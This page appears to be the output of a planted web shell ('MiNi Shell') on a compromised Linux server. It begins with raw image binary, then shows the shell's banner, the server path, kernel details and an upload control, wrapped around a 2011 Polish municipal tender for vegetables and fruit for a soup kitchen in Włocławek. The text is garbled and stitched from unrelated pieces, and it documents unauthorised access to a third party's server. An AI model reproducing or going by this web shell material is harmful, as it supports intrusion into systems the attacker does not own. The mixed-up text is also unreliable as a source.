JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110524/127098-N-2011.html

<p class="kh_header"><b>Włocławek: Dostawy warzyw i owoców dla Miejskiej Jadłodajnia U Świętego Antoniego we Włocławku ( MJ.34310-15/2011 )</b><br>
<b>Numer ogłoszenia: 127098 - 2011; data zamieszczenia: 24.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Jadłodajnia "U Świętego Antoniego" , ul. Św. Antoniego 11, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4110380, faks 54 4110380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.jadlodajniawloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców dla Miejskiej Jadłodajnia U Świętego Antoniego we Włocławku ( MJ.34310-15/2011 ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy WARZYW I OWOCÓW dla Miejskiej Jadłodajni U Świętego Antoniego:
Część I zamówienia (ziemniaki):
a)	Ziemniaki, świeże, średniej wielkości, tzn. o przeciętnej średnicy od 4 cm, i przeciętnej długości od 6 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord,  Bitnia jadalne z 2011 r., jednostka miary kilogram, ilość 18.000 kilogramów,

Część II zamówienia (warzywa i owoce):
a)	Marchew, bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 1.700 kilogramów,
b)	Kapusta czerwona, świeża, w główkach, o wadze główki od 1 kg, jednostka miary kilogram, ilość 900 kilogramów,
c)	Groch, łuskany, połówki, jednostka miary kilogram, ilość 550 kilogramów,
d)	Fasola drobna, biała, jednostka miary kilogram, ilość 300 kilogramów,
e)	Fasola typu Jaś, duża, jednostka miary kilogram, ilość 500 kilogramów,
f)	Cebula, świeża, twarda, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 1.300 kilogramów
g)	Burak ćwikłowy, średniej wielkości, tzn. o średnicy od 6cm do 10cm lub podłużny o długości od 8 cm do 16 cm i średnicy od 6 cm do 8 cm, jednostka miary kilogram, ilość 2.200 kilogramów,
h)	Nać pietruszki, świeża, o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram, ilość 95 kilogramów,
i)	Koper, świeży, o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 25 cm, jednostka miary kilogram, ilość 80 kilogramów,
j)	Ogórek zielony, twardy, średniej wielkości, tzn. o długości od 15cm do 19cm i średnicy od 3cm  do 5cm, w całości, szklarniowy, jednostka miary kilogram, ilość 80 kilogramów,
k)	Ogórek zielony, twardy, średniej wielkości, tzn. o długości od 10cm do 16cm i średnicy od 3cm  do 5cm, w całości, polny, jednostka miary kilogram, ilość 700 kilogramów,
l)	Papryka surowa, czerwona, świeża, cała, jednostka miary kilogram, ilość 650 kilogramów,
m)	Pieczarka, świeża, średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3 cm do 5cm, jednostka miary kilogram, ilość 220 kilogramów,
n)	Pietruszka korzeń, świeża, bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 100 kilogramów,
o)	Pomidor, świeży, twardy, niepoobijany, czerwony, cały, średniej wielkości,  tzn. o średnicy od 5cm do 8cm, polny, jednostka miary kilogram, ilość 800 kilogramów,
p)	Pomidor, świeży, twardy, niepoobijany, czerwony, cały, średniej wielkości,  tzn. o średnicy od 5cm do 8cm, szklarniowy, jednostka miary kilogram, ilość 70 kilogramów,
q)	Por, świeży, oczyszczony, gruby, tzn. o średnicy od 2cm do 4cm, w całości, jednostka miary kilogram, ilość 190 kilogramów,
r)	Sałata, świeża, cała, o średnicy główki od 18cm do 22cm, nieprzerośnięta, polna, jednostka miary kilogram, ilość 300 kilogramów,
s)	Sałata, świeża, cała, o średnicy główki od 18cm do 22cm, nieprzerośnięta, szklarniowa, jednostka miary kilogram, ilość 50 kilogramów,
t)	Cukinia, twarda, nieprzerośnięta, średniej wielkości, tzn. o długości od 18cm do 22cm i średnicy od 7cm do 9cm, jednostka miary kilogram, ilość 1.100 kilogramów,
u)	Seler, świeży, duży, tzn. o przeciętnej średnicy od 10 cm do 12 cm, oczyszczony, bez liści, jednostka miary kilogram, ilość 600 kilogramów,
v)	Kapusta włoska, świeża w główkach, o wadze główki od 1,0 kg- 4,0 kg, jednostka miary kilogram, ilość 500 kilogramów,
w)	Jabłka, świeże, całe, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 310 kilogramów,
x)	Kapusta biała, świeża w główkach, o wadze główki od 1,0kg do 4,0kg bez liści bocznych, jednostka miary kilogram, ilość 5.400 kilogramów,
y)	Kapusta pekińska, świeża w główkach, o minimalnej średnicy 9cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 600 kilogramów,
z)	Czosnek, w główkach o średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 5cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 5 kilogramów.

Część III zamówienia (warzywa kiszone):
a)	Kapusta kwaszona z marchewką, bez konserwantów, jednostka miary kilogram, ilość 3.000 kilogramów,
b)	Ogórek kiszony twardy, o długości od 8 cm do 10 cm i średnicy od 3 cm do 4 cm, w całości, jednostka miary kilogram, ilość 1.500 kilogramów.

2.	Jakość wymienionego wyżej asortymentu nie może odbiegać od jakości towaru dostępnego w ogólnej sieci handlowej. 
3.	Wykonawca zapewnia transport WARZYW I OWOCÓW do magazynu w siedzibie zamawiającego na własny koszt, dlatego cena oferty musi zawierać koszty transportu i rozładunku.
4.	Transport WARZYW I OWOCÓW musi odbywać się w warunkach spełniających wymogi sanitarno - epidemiologiczne.
5.	Miejscem dostaw jest magazyn Miejskiej Jadłodajni U Świętego Antoniego przy ul. Św. Antoniego 11 we Włocławku.
6.	Ilość WARZYW I OWOCÓW, o których mowa w pkt III/1 może ulec zmianie ilościowo maksimum o minus 15%.
7.	Zamawiający będzie zamawiał określoną partię towaru telefonicznie lub faksem z jednodniowym wyprzedzeniem, najpóźniej do godziny 13:00.
8.	Dostawy będą odbywać się sukcesywnie przez okres obowiązywania umowy, ilościowo według zapotrzebowania zamawiającego:
- część I i II zamówienia - nie częściej niż pięć razy w tygodniu każdorazowo do godz. 8:00,
- część III zamówienia - nie częściej niż dwa razy w tygodniu każdorazowo do godz. 9:00.
W przypadku stwierdzenia w trakcie odbioru dostawy braków ilościowych i jakościowych Wykonawca dostarczenia towar wolny od wad jakościowych i uzupełnienia braki ilościowe w terminie do dwóch godzin od momentu zgłoszenia reklamacji.
9.	Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.21.21.00-1, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9, 15.33.11.40-0, 15.33.11.42-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany urzędowej stawki podatku VAT na artykuły wymienione w formularzu cenowym, stanowiącym załącznik nr 1 do umowy, Wykonawca niezwłocznie i pisemnie powiadamia o tym fakcie Zamawiającego, przytaczając podstawę prawną. Zamawiający zastrzega sobie prawo do uwzględnienia zmiany urzędowej stawki podatku VAT na artykuły wymienione w formularzu cenowym, stanowiącym załącznik nr 1 do umowy w przypadku, kiedy zmiany te są korzystne dla zamawiającego lub nie można było ich przewidzieć w chwili składania oferty przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.jadlodajniawloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Jadłodajnia U Świętego Antoniego, ul. Św. Antoniego 11, 87-800 Włocławek Biuro I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2011 godzina 11:30, miejsce: Miejska Jadłodajnia U Świętego Antoniego, ul. Św. Antoniego 11, 87-800 Włocławek Biuro I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki, świeże, średniej wielkości, tzn. o przeciętnej średnicy od 4 cm, i przeciętnej długości od 6 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord,  Bitnia jadalne z 2011 r., jednostka miary kilogram, ilość 18.000 kilogramów,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Marchew, bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 1.700 kilogramów,
b)	Kapusta czerwona, świeża, w główkach, o wadze główki od 1 kg, jednostka miary kilogram, ilość 900 kilogramów,
c)	Groch, łuskany, połówki, jednostka miary kilogram, ilość 550 kilogramów,
d)	Fasola drobna, biała, jednostka miary kilogram, ilość 300 kilogramów,
e)	Fasola typu Jaś, duża, jednostka miary kilogram, ilość 500 kilogramów,
f)	Cebula, świeża, twarda, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 1.300 kilogramów
g)	Burak ćwikłowy, średniej wielkości, tzn. o średnicy od 6cm do 10cm lub podłużny o długości od 8 cm do 16 cm i średnicy od 6 cm do 8 cm, jednostka miary kilogram, ilość 2.200 kilogramów,
h)	Nać pietruszki, świeża, o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram, ilość 95 kilogramów,
i)	Koper, świeży, o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 25 cm, jednostka miary kilogram, ilość 80 kilogramów,
j)	Ogórek zielony, twardy, średniej wielkości, tzn. o długości od 15cm do 19cm i średnicy od 3cm  do 5cm, w całości, szklarniowy, jednostka miary kilogram, ilość 80 kilogramów,
k)	Ogórek zielony, twardy, średniej wielkości, tzn. o długości od 10cm do 16cm i średnicy od 3cm  do 5cm, w całości, polny, jednostka miary kilogram, ilość 700 kilogramów,
l)	Papryka surowa, czerwona, świeża, cała, jednostka miary kilogram, ilość 650 kilogramów,
m)	Pieczarka, świeża, średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3 cm do 5cm, jednostka miary kilogram, ilość 220 kilogramów,
n)	Pietruszka korzeń, świeża, bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 100 kilogramów,
o)	Pomidor, świeży, twardy, niepoobijany, czerwony, cały, średniej wielkości,         tzn. o średnicy od 5cm do 8cm, polny, jednostka miary kilogram, ilość 800 kilogramów,
p)	Pomidor, świeży, twardy, niepoobijany, czerwony, cały, średniej wielkości,        tzn. o średnicy od 5cm do 8cm, szklarniowy, jednostka miary kilogram, ilość 70 kilogramów,
q)	Por, świeży, oczyszczony, gruby, tzn. o średnicy od 2cm do 4cm, w całości, jednostka miary kilogram, ilość 190 kilogramów,
r)	Sałata, świeża, cała, o średnicy główki od 18cm do 22cm, nieprzerośnięta, polna, jednostka miary kilogram, ilość 300 kilogramów,
s)	Sałata, świeża, cała, o średnicy główki od 18cm do 22cm, nieprzerośnięta, szklarniowa, jednostka miary kilogram, ilość 50 kilogramów,
t)	Cukinia, twarda, nieprzerośnięta, średniej wielkości, tzn. o długości od 18cm do 22cm i średnicy od 7cm do 9cm, jednostka miary kilogram, ilość 1.100 kilogramów,
u)	Seler, świeży, duży, tzn. o przeciętnej średnicy od 10 cm do 12 cm, oczyszczony, bez liści, jednostka miary kilogram, ilość 600 kilogramów,
v)	Kapusta włoska, świeża w główkach, o wadze główki od 1,0 kg- 4,0 kg, jednostka miary kilogram, ilość 500 kilogramów,
w)	Jabłka, świeże, całe, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 310 kilogramów,
x)	Kapusta biała, świeża w główkach, o wadze główki od 1,0kg do 4,0kg bez liści bocznych, jednostka miary kilogram, ilość 5.400 kilogramów,
y)	Kapusta pekińska, świeża w główkach, o minimalnej średnicy 9cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 600 kilogramów,
z)	Czosnek, w główkach o średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 5cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 5 kilogramów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa kiszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Kapusta kwaszona z marchewką, bez konserwantów, jednostka miary kilogram, ilość 3.000 kilogramów,
b)	Ogórek kiszony twardy, o długości od 8 cm do 10 cm i średnicy od 3 cm do 4 cm,   w całości, jednostka miary kilogram, ilość 1.500 kilogramów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0, 15.33.11.42-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com